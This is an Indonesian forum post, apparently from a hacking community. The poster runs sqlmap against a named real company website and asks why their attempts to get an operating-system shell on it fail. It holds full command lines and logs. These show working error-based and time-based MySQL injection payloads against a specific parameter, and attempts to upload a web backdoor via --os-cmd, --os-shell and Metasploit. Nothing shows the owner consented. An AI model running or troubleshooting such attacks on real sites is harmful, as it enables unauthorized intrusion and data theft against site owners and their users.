[ASK] sqlmap lebih lanjut(bukan sekedar inject, need discuss)
#1
assalamualaikum Smile
malem om momod om mimin n all of ibteam members

ane ada pertanyaan dan juga butuh dikusi dengan teman2 semua

sqlmap identik dengan injection bukan,,
nah mlihat option yang ada pada sqlmap
Code:
Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an out-of-band shell, meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, meterpreter or VN
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process' user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory

ane mencoba untuk menggunakan option diatas.
target sebagai berikut :
url http://www.altechna.com
[23:41:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0

nah ane sudah gunakan
Code:
--os-cmd=cmd.exe
--os-shell
--msf-path=pathnya
hasilnya sebagai berikut:
Code:
--os-cmd

C:\sqlmap>sqlmap.py -u http://www.altechna.com:80/product_details.php?id=374 --r
andom-agent --threads 5 -D altechna2 -T users --os-cmd=cmd

    sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program

[*] starting at 23:41:31

[23:41:31] [INFO] fetched random HTTP User-Agent header from file 'C:\sqlmap\txt
\user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b3) Gec
ko/2008020514 Firefox/3.0b3
[23:41:31] [INFO] using 'C:\sqlmap\output\www.altechna.com\session' as session f
ile
[23:41:31] [INFO] resuming injection data from session file
[23:41:31] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[23:41:31] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=374 AND (SELECT 8402 FROM(SELECT COUNT(*),CONCAT(0x3a7a74743a,(S
ELECT (CASE WHEN (8402=8402) THEN 1 ELSE 0 END)),0x3a62736e3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=374 AND SLEEP(5)
---

[23:41:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0
[23:41:52] [INFO] going to use a web backdoor for command execution
[23:41:52] [INFO] fingerprinting the back-end DBMS operating system
[23:41:52] [INFO] the back-end DBMS operating system is Windows
[23:41:52] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
>
[23:42:06] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot
/]: C:/xampp/www/htdocss
[23:42:37] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [E
nter for None]:
[23:43:14] [WARNING] unable to upload the file stager on 'C:/xampp/www/htdocss'
[23:43:14] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 1 times
[23:43:14] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\www.
altechna.com'

[*] shutting down at 23:43:14

Code:
--os-shell

C:\sqlmap>sqlmap.py -u http://www.altechna.com:80/product_details.php?id=374 --r
andom-agent --threads 5 -D altechna2 -T users --os-shell

    sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program

[*] starting at 23:57:38

[23:57:38] [INFO] fetched random HTTP User-Agent header from file 'C:\sqlmap\txt
\user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (
KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2
[23:57:38] [INFO] using 'C:\sqlmap\output\www.altechna.com\session' as session f
ile
[23:57:38] [INFO] resuming injection data from session file
[23:57:38] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[23:57:40] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=374 AND (SELECT 8402 FROM(SELECT COUNT(*),CONCAT(0x3a7a74743a,(S
ELECT (CASE WHEN (8402=8402) THEN 1 ELSE 0 END)),0x3a62736e3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=374 AND SLEEP(5)
---

[23:58:00] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0
[23:58:00] [INFO] going to use a web backdoor for command prompt
[23:58:00] [INFO] fingerprinting the back-end DBMS operating system
[23:58:00] [INFO] the back-end DBMS operating system is Windows
[23:58:00] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
> 3
[23:58:26] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot
/]: C:/wamp/htdocs/
[23:58:48] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [E
nter for None]:
[23:59:10] [WARNING] unable to upload the file stager on 'C:/wamp/htdocs'
[23:59:10] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 1 times
[23:59:10] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\www.
altechna.com'

[*] shutting down at 23:59:10

Code:
--msf-path=


C:\sqlmap>sqlmap.py -u http://www.altechna.com:80/product_details.php?id=374 --r
andom-agent --threads 5 -D altechna2 -T users --msf-path=C:\Program Files (x86)\
Rapid7\framework

    sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program

[*] starting at 00:07:59

[00:07:59] [INFO] fetched random HTTP User-Agent header from file 'C:\sqlmap\txt
\user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Geck
o/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
[00:07:59] [INFO] using 'C:\sqlmap\output\www.altechna.com\session' as session f
ile
[00:07:59] [INFO] resuming injection data from session file
[00:07:59] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[00:08:00] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=374 AND (SELECT 8402 FROM(SELECT COUNT(*),CONCAT(0x3a7a74743a,(S
ELECT (CASE WHEN (8402=8402) THEN 1 ELSE 0 END)),0x3a62736e3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=374 AND SLEEP(5)
---

[00:08:20] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0
[00:08:20] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\www.
altechna.com'

[*] shutting down at 00:08:20

apakah ada yang salah om???





Users browsing this thread: 1 Guest(s)